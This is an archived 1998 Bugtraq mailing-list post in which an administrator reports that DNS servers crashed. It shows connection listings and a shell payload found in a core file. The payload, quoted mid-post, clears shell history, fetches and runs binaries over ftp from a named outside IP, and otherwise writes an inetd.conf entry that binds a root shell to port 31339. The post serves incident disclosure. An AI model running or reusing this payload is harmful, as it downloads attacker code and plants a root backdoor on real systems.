[7018] in bugtraq
Yipes named attack
daemon@ATHENA.MIT.EDU (Anonymous)
Wed Jun 24 17:39:53 1998
Date: Wed, 24 Jun 1998 16:20:01 -0400
Reply-To: Anonymous <nobody@ANON.MYOFB.ORG>
From: Anonymous <nobody@ANON.MYOFB.ORG>
To: BUGTRAQ@NETSPACE.ORG
All my name servers cored
connections looked like thislocalhost.36486 localhost.32773 32768 0 8192 0 ESTABLISHED
localhost.32773 localhost.36486 8192 0 32768 0 ESTABLISHED
localhost.36489 localhost.32773 32768 0 8192 0 ESTABLISHED
localhost.32773 localhost.36489 8192 0 32768 0 ESTABLISHED
localhost.36492 localhost.36484 32768 0 8192 0 ESTABLISHED
localhost.36484 localhost.36492 8192 0 32768 0 ESTABLISHED
localhost.36495 localhost.36494 32768 0 8192 0 ESTABLISHED
localhost.36494 localhost.36495 8192 0 32768 0 ESTABLISHED
localhost.36498 localhost.36484 32768 0 8192 0 ESTABLISHED
localhost.36484 localhost.36498 8192 0 32768 0 ESTABLISHED
localhost.36501 localhost.36500 32768 0 8192 0 ESTABLISHED
localhost.36500 localhost.36501 8192 0 32768 0 ESTABLISHED
localhost.36516 localhost.36484 32768 0 8192 0 ESTABLISHED
localhost.36484 localhost.36516 8192 0 32768 0 ESTABLISHED
localhost.36519 localhost.36518 32768 0 8192 0 ESTABLISHED
localhost.36518 localhost.36519 8192 0 32768 0 ESTABLISHED
>
this is in the core file
>/bin/bash
>export HISTFILE=;if [ ! -x /sbin/inetd ];then cd /sbin;ping -c 1 208.21.174.3;ec
>ho -e 'open 208.21.174.3\nuser ftp h@e.y\nbin\nget i\nget d\nbye'|ftp -vin;if [
>-f i ];then chmod a+rx i d;mv i inetd;./d;else echo '31339 stream tcp nowait roo
>t /bin/bash sh -i'>/etc/inetd.conf;fi;fie
Sun tells me to appl the latest patch
but 7 phone calls later can't tell me if
the patch addresses this hack.
=;{>
